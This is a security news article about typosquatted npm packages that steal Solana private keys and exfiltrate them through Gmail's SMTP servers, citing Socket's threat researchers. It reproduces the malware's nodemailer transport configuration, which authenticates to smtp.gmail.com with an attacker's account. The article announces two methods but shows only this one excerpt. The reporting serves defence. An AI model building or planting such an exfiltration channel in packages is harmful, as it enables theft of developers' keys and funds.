Hackers have deployed malicious npm packages designed to exfiltrate Solana private keys through Gmail’s trusted infrastructure, as uncovered recently by Socket’s threat research team.
The campaign, which came to light on January 8, 2025, exploits the inherent trust in Gmail’s SMTP servers to bypass security measures and steal sensitive cryptocurrency data.
The malicious packages, identified as @async-mutex/mutex, dexscreener, solana-transaction-toolkit, and solana-stable-web-huks, employ typosquatting techniques to masquerade as legitimate tools.
Security analysts discovered that all these packages intercept private keys during wallet interactions and funnel them through Gmail’s SMTP servers, making detection by firewalls and endpoint security systems challenging.
The attackers utilized two distinct methods:

    // Exfiltration transport used by the malicious packages, as reported by Socket:
    // Gmail's SMTP server over implicit TLS (port 465), authenticated with an
    // attacker-controlled account so the traffic blends in with legitimate Gmail use.
    const nodemailer = require("nodemailer");

    const transporter = nodemailer.createTransport({
      host: "smtp.gmail.com",
      port: 465,
      secure: true,
      auth: {
        user: "vision.high.ever@gmail.com",
        pass: "[redacted]",
      },
    });
The malicious packages have been downloaded over 130 times, potentially compromising numerous developer accounts and environments. The attackers also leveraged GitHub repositories to lend credibility to their campaign, creating a façade of legitimacy for unsuspecting developers.
Kirill Boychenko, a threat intelligence analyst at Socket, said: “Because Gmail is a trusted email service, these exfiltration attempts are less likely to be flagged by firewalls or endpoint detection systems, which treat smtp.gmail.com as legitimate traffic.”
This incident highlights the growing trend of cybercriminals exploiting trusted platforms like GitHub and npm for malicious purposes. In 2024, the number of malicious packages found on open source package managers surged by 1300% compared to 2020.
Socket’s researchers warned that AI-powered descriptions could inadvertently lend credibility to malicious software, potentially guiding even cautious users towards installing harmful dependencies.
Developers are urged to exercise caution when installing npm packages, especially those with low download counts or recent publication dates. Socket recommends using its GitHub app and CLI tools to scan dependencies for potential threats.
Additionally, cryptocurrency platforms and individual wallet holders should remain vigilant and ensure their accounts are secure.
Regular audits of dependencies and strict access controls around private keys are crucial in mitigating such risks.